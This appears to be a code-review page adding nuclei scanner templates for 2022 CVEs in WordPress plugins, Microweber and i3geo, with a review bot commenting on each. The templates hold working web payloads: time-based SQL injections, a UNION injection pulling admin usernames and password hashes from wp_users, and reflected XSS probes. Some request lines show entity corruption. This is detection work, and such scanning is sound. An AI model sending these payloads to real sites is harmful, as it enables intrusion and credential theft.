POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains_all(body_2, "<img src onerror=alert(document.domain)>", "ditty")'
|
||||||
|
condition: and
|
|
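Review bot: The `classification` block has no `cve-id` line, while the other templates in this commit carry `cve-id` alongside `cvss-metrics`; add `cve-id: CVE-2022-0533`. `remediation: upgrade to v.3.0.15` is inconsistent with the `Fixed in version X` wording used elsewhere in the commit.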
@ -0,0 +1,52 @@
|
||||||
|
id: CVE-2022-0651
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
|
||||||
|
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/wp-statistics/
|
||||||
|
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0651
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-0651
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
google-query: inurl:/wp-content/plugins/wp-statistics
|
||||||
|
tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp,wp-statistics
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home'-sleep(6)-'¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "application/json")
|
||||||
|
- contains(body, 'Visitor Hit was recorded successfully')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '_wpnonce=([0-9a-zA-Z]+)'
|
||||||
|
internal: true
|
|
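Review bot: The second request line shows `track_all=1×tamp=11¤t_page_type=`, which looks like `&timestamp=` and `&current_page_type=` having been turned into the HTML entities `×` and `¤` somewhere between the file and this page; if those characters are really in the template, the `timestamp` and `current_page_type` parameters are broken and the request is no longer the one the description refers to, so the raw file should be checked. The same rendering appears in CVE-2022-25148 and CVE-2022-25149 further down. The tag list contains `wp` twice. The three WP Statistics templates in this commit share the identical `name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection`, so a scan report cannot tell which parameter was flagged; naming the parameter (here `current_page_type`) in each name would fix that. The dsl lines use unsuffixed `duration`, `status_code`, `header` and `body` in a two-request template while other templates here use `_2` suffixes; confirm they bind to the second response as intended.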
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2022-0658
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CommonsBooking < 2.6.8 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.
|
||||||
|
remediation: Fixed in version 2.6.8
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/d7f0805a-61ce-454a-96fb-5ecacd767578
|
||||||
|
- https://wordpress.org/plugins/commonsbooking/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0658
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-0658
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(header, "application/json")'
|
||||||
|
- 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")'
|
||||||
|
condition: and
|
|
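Review bot: `metadata` has no `max-request`; the template sends one request, so add `max-request: 1` as the sibling templates do. The tag list omits `wpscan` although the primary reference is a wpscan advisory; the other wpscan-sourced templates in this commit carry that tag.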
@ -0,0 +1,41 @@
|
||||||
|
id: CVE-2022-0787
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
|
||||||
|
remediation: Fixed in version 5.1
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
|
||||||
|
- https://wordpress.org/plugins/wp-limit-failed-login-attempts/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0787
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-0787
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(all_headers, "text/html")
|
||||||
|
- contains(body, 'iTotalDisplayRecords')
|
||||||
|
condition: and
|
|
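Review bot: The dsl list mixes styles: `duration>=6` and `status_code == 200` are plain scalars while the same expressions are single-quoted in CVE-2022-0658 and CVE-2022-3142, and `contains(all_headers, "text/html")` uses `all_headers` where the other templates use `header` or `content_type`. Quoting every dsl entry and writing `contains(content_type, "text/html")` would make the matcher block read like the rest of the commit. `metadata` also has no discovery hint (`publicwww-query` or similar) although the other WordPress plugin templates carry one; optional, but worth keeping consistent.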
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2022-0814
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ubigeo de Peru < 3.6.4 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
|
||||||
|
- https://wordpress.org/plugins/ubigeo-peru/
|
||||||
|
remediation: Fixed in version 3.6.4
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-0814
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/ubigeo-peru/"
|
||||||
|
tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'idProv'
|
||||||
|
- 'idDist'
|
||||||
|
- 'distrito'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
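Review bot: The word matcher looks for `idProv`, `idDist` and `distrito`, which are the plugin's normal AJAX response fields, so it will also match a patched install that simply returns the district list; the template cannot distinguish vulnerable from fixed versions and the matcher should key on something only the injected query produces. The injected body also selects `user_pass` from a hard-coded `wp_users` table, which copies a credential hash into scanner output and misses installs with a non-default table prefix; a detection probe should select a harmless marker value rather than credential data. `remediation` sits between `reference` and `classification` here while every other template places it directly after `description`.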
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2022-0899
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0899
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-0899
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "<script>alert(/document.domain/)</script>")'
|
||||||
|
- 'contains(body_2, "All Snippets")'
|
||||||
|
condition: and
|
|
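Review bot: `metadata` has no `max-request` although two raw requests are sent; add `max-request: 2`. There is no `remediation` line either, while the name already states the fixed version, so `remediation: Fixed in version 1.1.24` can be added. The tag list omits `wpscan` unlike the other wpscan-sourced templates in this commit.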
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2022-2174
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: microweber 1.2.18 - Cross-site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.
|
||||||
|
reference:
|
||||||
|
- https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2174
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174
|
||||||
|
- https://www.tenable.com/cve/CVE-2022-2174
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cve-id: CVE-2022-2174
|
||||||
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,microweber,xss,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 500'
|
||||||
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(body, "microweber")'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
condition: and
|
|
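Review bot: The tag list says `cve2023` for CVE-2022-2174 and should be `cve2022`. The MITRE reference `cvename.cgi?name=2022-2174` lacks the `CVE-` prefix and will not resolve; it should be `cvename.cgi?name=CVE-2022-2174`. The matcher requires `status_code == 500`, which is unusual for a reflected XSS check; if the reflection is on an error page that is fine, but a one-line comment in the template saying so would stop a later maintainer from "fixing" it to 200.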
@ -0,0 +1,52 @@
|
||||||
|
id: CVE-2022-25148
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
|
||||||
|
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/wp-statistics/
|
||||||
|
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25148
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-25148
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
google-query: inurl:/wp-content/plugins/wp-statistics
|
||||||
|
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "application/json")
|
||||||
|
- contains(body, 'Visitor Hit was recorded successfully')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '_wpnonce=([0-9a-zA-Z]+)'
|
||||||
|
internal: true
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2022-25149
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/wp-statistics/
|
||||||
|
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25149
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-25149
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/wp-statistics/"
|
||||||
|
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 50s
|
||||||
|
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "application/json")
|
||||||
|
- contains(body, 'Visitor Hit was recorded successfully')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '_wpnonce=([0-9a-zA-Z]+)'
|
||||||
|
internal: true
|
|
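Review bot: `@timeout: 50s` is far larger than a `sleep(6)` probe needs and than the 15s/20s the two sibling WP Statistics templates use; a long timeout slows scans against hosts that hang, so `@timeout: 15s` would be consistent. This template has no `remediation` line while CVE-2022-0651 and CVE-2022-25148 carry `remediation: Update wp-statistics plugin to version 13.1.6, or newer.`, which applies here as well.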
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2022-2535
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: Medium
|
||||||
|
description: |
|
||||||
|
The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
|
||||||
|
remediation: Fixed in version 1.6.2
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2022-2535
|
||||||
|
cwe-id: CWE-639
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/"
|
||||||
|
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "searchwp-live-search-result")'
|
||||||
|
condition: and
|
|
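Review bot: `severity: Medium` is capitalised while every other template uses lowercase `medium`; nuclei's severity field is an enumerated lowercase value, so this should be `severity: medium` or template validation may reject it. The tag list says `cve2023` for a 2022 CVE and should be `cve2022`. The description has a typo, `users making. alive search`, which should read `users making a live search`.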
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2022-3142
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: NEX-Forms Plugin < 7.9.7 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
|
||||||
|
remediation: Fixed in version 7.9.7
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
|
||||||
|
- https://www.exploit-db.com/exploits/51042
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3142
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cwe-id: CWE-89
|
||||||
|
cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,wordpress,sqli,wp-plugin,wp,wpscan,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 30s
|
||||||
|
GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=5'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(body_2, "NEX-Forms")'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
condition: and
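Review bot: The time-based check `duration>=5` has no baseline, so a slow target whose dashboard simply takes five seconds to render will be scored as injectable; comparing with the login round-trip, `- 'duration_2>=5 && duration_1<5'`, reduces that (the unsuffixed `duration` applies to the last response, which here is request 2, so `duration_2` also reads consistently next to `status_code_2`). `metadata` lacks `max-request: 2` and `classification` lacks `cve-id: CVE-2022-3142`, both of which the sibling templates carry.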
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2022-3242
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Microweber <1.3.2 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.
|
||||||
|
reference:
|
||||||
|
- https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/
|
||||||
|
- https://www.tenable.com/cve/CVE-2022-3242
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3242
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
tags: xss,cve,cve2023,microweber
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
|
||||||
|
condition: and
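Review bot: `tags: xss,cve,cve2023,microweber` carries the wrong year tag for a 2022 CVE and the classification block has no `cve-id`, unlike the sibling templates; suggest `tags: cve,cve2022,xss,microweber` and `cve-id: CVE-2022-3242`. The description is NVD's "Code Injection" wording while the template tests reflected XSS (cwe-id CWE-79); consider rewording it to what the request actually demonstrates, e.g. `Microweber prior to 1.3.2 reflects the keywords parameter of search.php without escaping, leading to cross-site scripting.`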
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2022-34093
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
|
||||||
|
- https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-34093
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,i3geo,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
|
||||||
|
condition: and
